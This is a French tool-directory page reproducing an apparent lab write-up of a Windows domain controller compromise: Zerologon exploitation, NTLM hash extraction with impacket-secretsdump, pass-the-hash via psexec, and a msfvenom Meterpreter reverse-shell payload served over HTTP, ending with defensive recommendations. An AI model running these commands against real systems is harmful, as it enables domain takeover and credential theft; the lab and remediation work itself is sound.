Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Domain-Controller-DC-Exploitation-with-Metasploit-Impacket — Exploitation de bout en bout d'un contrôleur de domaine avec Metasploit et Impacket : découverte de DC10, exploitation de Zerologon (CVE-2020-1472), extraction de hachages NTLM, obtention d'un shell SYSTEM et établissement d'une session Meterpreter. | Kitploit
Outils/GitHubGitHub/nyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket
ReconnaissanceFrameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésMouvement LatéralPost-ExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubnyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket

Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

Exploitation de bout en bout d'un contrôleur de domaine avec Metasploit et Impacket : découverte de DC10, exploitation de Zerologon (CVE-2020-1472), extraction de hachages NTLM, obtention d'un shell SYSTEM et établissement d'une session Meterpreter.

Voir le dépôt
il y a 10 moisPas encore vérifié
Partager

Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

Exploitation de bout en bout d'un contrôleur de domaine à l'aide de Metasploit et Impacket : découverte de DC10, exploitation de Zerologon (CVE-2020-1472), extraction des hashs NTLM, obtention d'un shell SYSTEM et établissement d'une session Meterpreter.

Résumé exécutif Cet exercice démontre une chaîne d'attaque complète et réaliste contre un contrôleur de domaine vulnérable à CVE-2020-1472 (Zerologon). L'engagement comprenait la découverte, l'enrichissement des services, l'exploitation, l'extraction d'identifiants, le mouvement latéral et la validation post-exploitation. J'ai obtenu avec succès un accès au niveau SYSTEM et établi une session Meterpreter persistante sur le contrôleur de domaine en combinant Zerologon, Impacket secretsdump + pass-the-hash, et des payloads msfvenom/meterpreter. Des captures d'écran et des artefacts de commandes ont été collectés à chaque étape comme preuve.

Vue d'ensemble du lab : Simulation d'une chaîne d'attaque complète sur un contrôleur de domaine Windows en utilisant Metasploit et Impacket ; découverte, Zerologon, secretsdump, pass-the-hash, et une session Meterpreter contrôlée.

Pourquoi c'est important pour les organisations : Parce que le contrôleur de domaine gère l'authentification, les stratégies de groupe et l'identité de l'ensemble du domaine, une compromission peut dégénérer en interruption totale de l'activité, prise de contrôle de comptes, exfiltration de données, déploiement de ransomwares et perte de confiance réglementaire. Protéger les contrôleurs de domaine préserve la disponibilité, les revenus et la réputation en empêchant les attaquants de faire de l'identité un point de défaillance unique.

Exploitation de contrôleur de domaine (DC) avec Metasploit + Impacket

### Vérification de la version SMB J'ai lancé un serveur web basique pour permettre au système cible d'accéder facilement à cet exécutable meterpreter en utilisant : Sur la machine cible, j'ai exécuté l'exécutable meterpreter (secret.exe)

SCÉNARIO

Deux machines vous sont fournies dans un réseau de laboratoire clos. L'un des systèmes est un contrôleur de domaine Windows (DC) nommé DC10 qui héberge les services AD principaux. L'autre système est un poste de travail Kali placé dans le même sous-réseau serveur à des fins de test. On suppose que le contrôleur de domaine expose des services de domaine typiques (par exemple, LDAP, Kerberos, SMB) et peut être vulnérable à des problèmes connus. L'hôte Kali est destiné à être utilisé pour la reconnaissance, l'exploitation, l'accès aux identifiants, le mouvement latéral et la validation post-exploitation. La tâche consiste à identifier le contrôleur de domaine, confirmer les détails du domaine, obtenir un premier point d'appui à l'aide d'une technique appropriée, extraire les identifiants pour permettre un accès administratif, puis démontrer le contrôle du contrôleur de domaine via un shell distant et une session d'agent gérée, tout en s'adaptant aux contraintes de l'environnement telles que des services corrigés, une sortie réseau restreinte ou des défenses de point de terminaison. DC: 10.1.16.1 Kali: 10.1.16.66

Points clés

  • Vulnérabilité critique exploitée : CVE-2020-1472 (Zerologon) a été exploitée avec succès pour réinitialiser le mot de passe du compte machine du contrôleur de domaine à vide.
  • Compromission d'identifiants : les hashs NTLM ont été extraits du contrôleur de domaine (secretsdump), révélant les identifiants Administrateur permettant le pass-the-hash.
  • Contrôle complet du domaine démontré : en utilisant les hashs extraits, un shell SYSTEM sur DC10 a été obtenu (psexec), et un reverse shell Meterpreter stable a été exécuté, confirmant l'exécution de code à distance et la persistance.
  • Services exposés : LDAP, Kerberos, SMB et les services RPC associés étaient accessibles depuis l'hôte attaquant, permettant la découverte et l'exploitation.
  • Risque de surface d'attaque : le contrôleur de domaine acceptait des opérations à distance qui ont permis la manipulation du compte machine et l'exécution de payload à distance.

1) Découverte et périmètre

J'ai utilisé msfconsole avec le support de la base de données, lancé un balayage nmap depuis MSF, importé les résultats, puis affiné les hôtes et services pour confirmer l'exposition de DC10.

  • Lancement de msfconsole avec le support de la base de données et confirmation de la connectivité de la base.
  • Exécution d'un scan nmap sur le sous-réseau depuis msfconsole et importation des résultats dans la base de données MSF.
  • Nettoyage de la table des hôtes pour retirer mon IP Kali. Examen des services pour repérer les indicateurs probables d'un contrôleur de domaine.
  • Utilisation du scanneur de ports SYN de MSF avec une plage de ports restreinte et un threading global pour affiner les données de services.
  • Prise d'empreinte SMB (fingerprinting) sur les hôtes Windows pour enrichir les détails du système d'exploitation.
  • Confirmation des services LDAP et Kerberos sur 10.1.16.1 et vérification du nom de domaine via une requête LDAP.
  • Décision : considérer 10.1.16.1 comme le contrôleur de domaine cible pour l'exploitation et l'accès aux identifiants.
Image
Image
Image

2) Enrichissement des services et confirmation du contrôleur de domaine

J'ai effectué un scan de ports SYN dans MSF, pris l'empreinte SMB, et confirmé LDAP et Kerberos sur 10.1.16.1. J'ai interrogé LDAP pour récupérer le nom de domaine.

Image
Image
Image
Image
Image
  • J'ai utilisé le module de version SMB dans msfconsole : auxiliary/scanner/smb/smb_version.
  • J'ai défini les cibles à partir de la table des hôtes avec hosts -R .
  • J'ai obtenu en retour le dialecte SMB et les détails du système d'exploitation.
  • Résultat : 10.1.16.1 a révélé des informations Windows Server, ce qui correspondait au fait qu'il s'agisse du contrôleur de domaine.
Image
Image
Image
Image
Image

Requête LDAP

  • Pour le module de requête LDAP, j'ai utilisé auxiliary/gather/ldap_query.
  • J'ai défini rhosts 10.1.16.1 pour cibler directement DC10.
  • Je l'ai exécuté pour récupérer les informations de base de l'annuaire.
  • Résultat : confirmation du nom de domaine « structureality » et que LDAP répondait sur le contrôleur de domaine.
Image
Image
Image
Image

3) Exploitation de Zerologon (accès initial)

J'ai exécuté auxiliary/admin/dcerpc/cve_2020_1472_zerologon contre DC10 pour réinitialiser le mot de passe du compte machine à vide.

Image
Image

4) Accès aux identifiants (secretsdump)

À l'aide d'Impacket, j'ai extrait les hashs NTLM du contrôleur de domaine et identifié les identifiants Administrateur pour le pass-the-hash.

impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]

Image
Image

5) Mouvement latéral (psexec)

J'ai utilisé le pass-the-hash avec psexec pour obtenir un shell de niveau SYSTEM sur DC10 et validé l'identité de l'hôte.

impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 Comme vous pouvez le voir, je suis déjà dans C:\Windows\system32

Image
Image

6) Post-exploitation (Meterpreter)

J'ai généré un payload meterpreter reverse_tcp, je l'ai hébergé en HTTP, téléchargé sur DC10, lancé un handler, puis exécuté le payload pour ouvrir une session Meterpreter.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe

Image
Image

python3 -m http.server 8080

Image
Image
Image
Image
Image
Image

Comme vous pouvez le voir, j'ai maintenant établi une connexion reverse shell entre le contrôleur de domaine cible DC10 et le système Kali. Cela a été accompli en utilisant uniquement des exploits externes/à distance contre la cible vulnérable.

Bien que le système Kali soit situé dans le sous-réseau serveur avec la cible DC10, ces types d'attaques sont possibles via Internet si le système cible est exposé sur Internet.

7) Résultats clés

  • DC10 identifié comme contrôleur de domaine pour structureality
  • Zerologon a réussi, permettant l'extraction d'identifiants
  • Hash Administrateur utilisé pour le shell SYSTEM via pass-the-hash
  • Session Meterpreter stable confirmée sur DC10

Preuves

  • Journaux de la base de données MSF et du scan de sous-réseau nmap confirmant la découverte des hôtes/services.
  • Sorties de l'énumération SMB/LDAP/Kerberos confirmant les services du contrôleur de domaine et le nom de domaine structureality.
  • Sortie du module Zerologon montrant la réinitialisation du mot de passe du compte machine à vide.
  • Sortie de secretsdump avec les hashs NTLM extraits.
  • Journaux de session psexec démontrant C:\Windows\System32.
  • Captures d'écran de la session msfvenom et Meterpreter confirmant le contrôle à distance.

Actions effectuées (résumé)

  • Découverte et périmètre : scans nmap depuis msfconsole ; base de données MSF utilisée pour gérer les hôtes/services ; DC10 confirmé comme cible.
  • Enrichissement des services : prise d'empreinte SMB, requêtes LDAP, confirmation de Kerberos pour valider le rôle de contrôleur de domaine.
  • Accès initial : exécution de auxiliary/admin/dcerpc/cve_2020_1472_zerologon pour réinitialiser le mot de passe du compte machine du contrôleur de domaine.
  • Accès aux identifiants : impacket-secretsdump pour extraire les hashs NTLM du contrôleur de domaine.
  • Mouvement latéral : impacket-psexec avec le hash NTLM Administrateur → shell SYSTEM.
  • Post-exploitation : création et hébergement d'un payload meterpreter (msfvenom), téléchargement et exécution sur le contrôleur de domaine, et confirmation d'une session persistante.

Recommandations pour les responsables du réseau

  • Corriger immédiatement la vulnérabilité Netlogon et vérifier par un scan de l'exposition à CVE-2020-1472
  • Imposer la signature SMB et restreindre l'exposition SMB et RPC du contrôleur de domaine aux seuls sous-réseaux d'administration de confiance
  • Mettre en place une administration hiérarchisée (tiered admin) et refuser l'exécution de services à distance depuis des hôtes de gestion non administrateurs
  • Désactiver ou contrôler strictement NTLM, privilégier Kerberos, et surveiller les schémas de pass-the-hash
  • Contrôle du trafic sortant : restreindre les connexions sortantes depuis les serveurs, n'autoriser que les destinations et ports requis
  • Protection des points de terminaison : bloquer les binaires non signés et appliquer une analyse intégrée à AMSI pour PowerShell
  • Surveillance : alerter sur les réinitialisations de mot de passe de comptes machines, les accès DRSUAPI anormaux et les écouteurs inattendus de type handler
  • Faire tourner régulièrement les identifiants privilégiés et utiliser des solutions LAPS ou PAM pour réduire le risque de réutilisation des hashs
Télécharger l’outil